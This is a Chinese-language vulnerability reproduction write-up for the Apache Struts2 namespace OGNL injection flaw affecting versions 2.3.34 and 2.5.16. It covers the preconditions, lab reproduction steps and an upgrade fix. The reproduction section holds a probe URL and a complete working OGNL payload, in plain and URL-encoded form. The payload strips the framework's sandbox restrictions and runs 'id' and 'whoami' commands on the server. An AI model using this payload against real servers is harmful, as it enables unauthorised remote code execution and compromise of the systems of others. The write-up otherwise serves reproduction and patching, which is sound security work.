漏洞描述:
Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。 action元素没有设置名称空间属性,或者使用了通配符名称空间将由用户从uri传递并解析为OGNL表达式,最终导致远程代码执行漏洞
漏洞利用条件:
1.定义XML配置时,如果namespace值未设置,且上层动作配置(Action Configuration)中未设置或使用通配符namespace时可能导致远程代码执行。
2.url标签未设置value和action值,且上层动作配置(Action Configuration)中未设置或使用通配符namespace时可能导致远程代码执行。
3.alwaysSelectFullNamespace需要被设为true,才能利用漏洞。
漏洞影响范围:
Struts 2.3.34
Struts 2.5.16
其它不受支持的Struts版本也可能受影响。
漏洞复现:
1.访问靶机地址http://ip:port/struts2-showcase/:
2.构造payload访问/struts2-showcase/$%7B233*233%7D/actionChain1.action,burp抓包,可以看到233*233在location头中返回了结果,说明存在漏洞:
3.构造POC,替换请求内容:${
(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec('id')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}
需要经过url编码:
$%7B%0A%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27whoami%27%29%29.%28@org.apache.commons.io.IOUtils@toString%28%23a.getInputStream%28%29%29%29%7D/actionChain1.action
修复建议:
升级到Apache Struts 2.3.35 或Struts 2.5.17版